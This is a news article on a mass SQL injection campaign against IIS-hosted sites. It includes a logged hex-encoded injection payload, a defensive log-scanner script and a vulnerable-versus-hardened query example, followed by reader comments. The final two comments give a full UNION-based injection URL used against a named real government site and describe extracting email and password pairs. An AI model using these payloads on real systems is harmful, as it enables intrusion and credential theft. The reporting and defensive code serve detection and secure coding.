Mass SQL Injection Attack Hits Sites Running IIS

There’s a large-scale attack underway that is targeting Web servers running Microsoft’s IIS software, injecting the sites with a specific malicious script. The attack has compromised tens of thousands of sites already, experts say, and there’s no clear indication of who’s behind the campaign right now.

The attack, which researchers first noticed earlier this week, already has affected a few high-profile sites, including those belonging to The Wall Street Journal and The Jerusalem Post. Some analyses of the IIS attack suggest that it is directed at a third-party ad management script found on these sites.

The massive campaign is targeting servers running Microsoft IIS and ASP.NET software. The attack appears to be a variation of the ever-popular SQL injection, in which attackers use malformed commands to insert code into vulnerable Web sites. Once a site is compromised, the injected code then attempts to compromise the machines of visitors to the site and install malware on their PCs as well.

This is an extremely popular attack vector that has been in wide use by a variety of attackers for the last few years and has been very successful, thanks to the shoddy state of Web security.

In the current attack on IIS-based sites, the malicious code attempts to redirect visitors to a specific site, which then installs malware on the victims’ machines. An analysis of the attack by Sucuri shows the details. Here’s what the original Web request looks like in the server log:

2010-06-07 13:31:15 W3SVC1 webserver 192.168.1.10 GET /page.aspx
utm_source=campaign&utm_medium=banner&utm_campaign=campaignid&utm_content=100x200';dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x6445634C6152652040742076……..
6F523B2D2D%20eXEc(@s)-- 80 - 121.xx.xxx.xx HTTP/1.1
Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) - -
www.website.com 200 0 0 32068 1685 0
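
As an added example (not from the article or from Sucuri's analysis), here is a small Python scanner for the pattern in the log line above: it URL-decodes the cs-uri-query field of an IIS W3C log line, looks for the DECLARE-a-varchar / EXEC-a-variable / long-hex-literal shape, and decodes any long hex literal so the hidden SQL can be read by an analyst. The log lines, client addresses and the hex payload are constructed; the payload decodes to a harmless placeholder, not the real injected script.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in the IIS W3C layout shown above (not the article's real log).
# The hex literal decodes to a harmless placeholder, not the real injected script.
INNER_SQL = "dEcLaRe @t vArChAr(255) sEt @t='placeholder' eXeC(@t)"
HEX_LITERAL = "0x" + INNER_SQL.encode("ascii").hex().upper()
SAMPLE_LOG = [
    "2010-06-07 13:31:15 W3SVC1 webserver 192.168.1.10 GET /page.aspx "
    "utm_source=campaign&utm_content=100x200';dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s="
    + HEX_LITERAL + "%20eXEc(@s)-- 80 - 121.0.0.1 HTTP/1.1 Mozilla/4.0 - - www.example.com 200 0 0 32068 1685 0",
    "2010-06-07 13:31:16 W3SVC1 webserver 192.168.1.10 GET /page.aspx "
    "utm_source=campaign&utm_content=100x200 80 - 10.0.0.5 HTTP/1.1 Mozilla/4.0 - - www.example.com 200 0 0 1200 300 0",
]

# Markers of the campaign's shape: a DECLARE of a varchar buffer, EXEC of a variable,
# or a long hex literal (the real SQL is hidden as hex so naive keyword filters miss it).
SQLI_MARKERS = re.compile(
    r"declare\s+@\w+\s+(?:n?varchar|char)\s*\(\s*\d+\s*\)"
    r"|exec\s*\(\s*@\w+\s*\)"
    r"|0x[0-9a-f]{40,}",
    re.IGNORECASE,
)

def decode_hex_literals(text):
    """Decode long 0x literals as ASCII so an analyst can read the hidden SQL."""
    decoded = []
    for m in re.finditer(r"0x([0-9a-fA-F]{8,})", text):
        try:
            decoded.append(bytes.fromhex(m.group(1)).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            decoded.append("<undecodable>")
    return decoded

def scan_iis_line(line):
    """Return a finding dict for a suspicious request line, or None."""
    fields = line.split()
    if len(fields) < 11:  # date time site host s-ip method uri-stem uri-query port user c-ip ...
        return None
    query = unquote_plus(fields[7])  # IIS logs the query URL-encoded; decode before matching
    markers = SQLI_MARKERS.findall(query)
    if not markers:
        return None
    return {"client_ip": fields[10], "uri": fields[6],
            "markers": markers, "decoded": decode_hex_literals(query)}

def scan_log(lines):
    """Scan a whole log; returns one finding per matching line."""
    return [hit for hit in (scan_iis_line(line) for line in lines) if hit]
```

Point it at a real IIS log with `scan_log(open(path))`; the decoded hex is what tells you whether the request carried the campaign's script or something else.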

Microsoft’s Jerry Bryant told Bob McMillan of the IDG News Service that the attack doesn’t exploit any vulnerability in IIS, but instead is an attack against third-party Web applications.

“The SQL injection attacks that allow the systems to be compromised are occurring due to vulnerabilities in third-party web applications and do not demonstrate vulnerabilities in Microsoft software,” Bryant told McMillan.

Estimates of the scope of the SQL injection attack have ranged from a few thousand compromised sites to more than 100,000 sites.

Discussion

  • Dark Energy on

    So what 3rd party software does this script affect?  Who needs to be concerned about this?  What software do these newspapers run?

  • Anonymous on

    Dark Energy, SQL injection attacks can affect web sites that do not properly take into account the possibility of SQL commands being injected into the fields of a web site. The third party being mentioned are the developer(s) of the sites affected.

  • Anonymous2 on

    This isn't a generic random SQL injection spam attack, Anon. Looking at the address line of "utm_source=campaign&utm_medium=banner&utm_campaign=campaignid&utm_content=100×200′;" it seems blatantly targeted to a very specific application. Dark's question is: What application?

  • Eddie on

    This is pretty easy to block with URLSCAN 3.1

    You can use the MaxAllowedContentLength, MaxUrl, and MaxQueryString settings and/or
    Drop anything with a Declare statement in it (not likely this is legit for most sites)

  • Anonymous on

    Looks like google analytics....

  • Anonymous on

    I've heard of this type of attack for many years. Why do programmers insist on writing SQL code which can be attacked in this way? Or is the code very old and unmaintained?

  • Anonymous on

    This has nothing to do with IIS, a SQL injection is a developer fault.

  • Anonymous on

    This is SQL injection, and you play it out as though it is a fault of IIS. If you actually knew anything about security you would know its just poorly written websites that are at fault. Without some level of competence, the average reader would deduce that "CRAPPY MS SOFTWARE FUHFUHFUH!"

  • Anonymous on

    Comment'); DROP TABLE Comments; --I wonder if you sanitize your inputs on comments?

  • Anonymous ' on

    asdasda

  • Anonymous on

    Believe me, the MS software is still crappy!  SQL injection is still a problem of coding though

  • Me on

    This is not a new attack. It is very old, and just being re-applied.  (And, it has nothing to do with Microsoft or IIS.  It's a fault of poor programming!) 

    The SQL Injection is rewriting your page's < title > tags and adding a javascript file which references the malicious unpacker code on a third party server.

    Big?  yes. Effective?  yes.  Stoppable?  Completely.  You need to clean your SQL before allowing it to be posted to the database.  Use Stored Procedures!

  • Josh from america on

    Ah, more windows users get burned, no surprise. This is another round of the darwin awards, wooo! Get em steve b, burn those customers lol.

  • Mark D. on

    Only poorly written MS SQL and Sybase applications are vulnerable to this particularly severe type of attack, due to the way both databases allow statements to be combined.  

    Poorly written applications for other databases are vulnerable to SQL injections as well (predicate modification mostly), but are not vulnerable to this type of attack, where an attacker can get the database to execute arbitrary SQL statements, because other databases do not allow SQL statements to be combined in the same willy nilly fashion.

  • Anonymous on

    Asprox worm style stupidity. Not new.

  • Anonymous on

    It is impossible to prevent sql injection attacks as long as web apps are coded improperly. Databases must be monitored as a second line of defense so intrusions can be detected and alarmed.  

  • Anonymous on

    Your headline names Microsoft IIS web server software even though this is completely unrelated to Microsoft or IIS. It's a vulnerability in code written by a 3rd party that runs on Microsoft platforms. It could just as easily have been a script written to run on Apache.

    But I guess a headline naming the vulnerable 3rd party doesn't get as much clickthrough traffic. Good job throwing away any integrity you have. A++ Kudos. Much easier than writing good content.

    Kevin, you are my journalism HERO.

  • Anonymous on

    Easy to really find out how many have been compromised: you just need to find the code of one containing the javascript that is fetching the malware, and then do a google search including key phrases. The results could astound you.

  • MoMo on

    Perhaps the idea behind name dropping IIS is the idea that a good majority of the time IIS is running MSSQL.  With that in mind -- who/whatever is pushing out these sql injections is going directly after MSSQL structure.  With that in mind, how many Apache servers run MS SQL.  So it's fair in thinking that because they are more-over targeting MSSQL ... therefore IIS ... therefore Microsoft ... therefore ... I'll stop there.  Just my two cents.

  • StareClips.com on

    By the way, for those saying that using stored procedures is "enough" to solve a SQL injection problem, keep in mind that more thought still needs to go into it.

    For instance, I have seen some stored procs which accept a varchar parameter which is a comma delimited list of numbers. Then it concatenates this parameter with a SQL statement (i.e., plugging the comma delimited list of numbers within a "WHERE IN (1,2,3)" statement)... and executes it with sp_executesql. This still allows a SQL injection problem even when stored procedures are used.

    So, much more thought than simply "use stored procs" needs to be applied. Just sayin'...
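
The comment above describes a stored procedure that pastes a comma-delimited list into an IN (...) clause and runs it through sp_executesql. As an added example (not the commenter's code, and written in Python over sqlite3 rather than T-SQL so it runs anywhere), here is that anti-pattern beside a version that validates each item and binds it as a parameter; the table and rows are constructed.

```python
import sqlite3

def make_db():
    """Constructed in-memory table standing in for the application's data."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, public INTEGER)")
    con.executemany("INSERT INTO products VALUES (?, ?, ?)",
                    [(1, "widget", 1), (2, "gadget", 1), (3, "secret-sku", 0)])
    return con

def lookup_vulnerable(con, id_list):
    # Mirrors the stored-proc anti-pattern: the caller's comma-delimited string is
    # pasted straight into the IN (...) clause, so SQL in the string becomes SQL in the query.
    sql = "SELECT name FROM products WHERE public = 1 AND id IN (" + id_list + ") ORDER BY id"
    return [row[0] for row in con.execute(sql)]

def lookup_hardened(con, id_list):
    # Validate each item as an integer, then bind one placeholder per value;
    # the values never become part of the SQL text.
    ids = []
    for item in id_list.split(","):
        item = item.strip()
        if not item.isdigit():
            raise ValueError(f"rejecting non-numeric id: {item!r}")
        ids.append(int(item))
    placeholders = ",".join("?" * len(ids))
    sql = f"SELECT name FROM products WHERE public = 1 AND id IN ({placeholders}) ORDER BY id"
    return [row[0] for row in con.execute(sql, ids)]

def hardened_rejects(con, id_list):
    """True if the hardened lookup refuses the input instead of running it."""
    try:
        lookup_hardened(con, id_list)
        return False
    except ValueError:
        return True
```

The same two shapes apply inside a T-SQL procedure: concatenating the parameter into the string handed to sp_executesql is the first function, and passing validated values through sp_executesql's own parameter list (or a table-valued parameter) is the second.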

  • Anonymous on

    It's sad how the name of IIS or MS SQL gets thrown away by an article like this one.

    Certainly when the subject is about SQL injection, which could be done in, well, any SQL server.

    Hence the name 'SQL' injection, not IIS injection.

    IIS works fine, has a great interface.

    Apache works fine, has a simple interface (start/stop :P)

    Other webservers will work fine too, as long as people like the writer of this article start getting their followers by using correct titles and content.

  • Anonymous on

    i got all the tables from http://www.nlrc.gov.ng/aboutus.php?id=1 i typed this... http://www.nlrc.gov.ng/aboutus.php?id=1%20%20union%20select%201,2,3,4,5,6,concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20information_schema.tables obviously i could go further if i changed adminlogin/profiling to ascii code. and if the passwords are encrypted theres always using a md5 hash cracker. Also to make my life easier i have a program called InDirectory opened in win.rar and this program finds the admin login panel and the user's admin panel.

  • Anonymous on

    oh and i found out that users and the admin log in with email/password so at concat(table_name) i would type concat (email,password) this would give me the email and the password together to split the I would type a0x3 where the comma is...
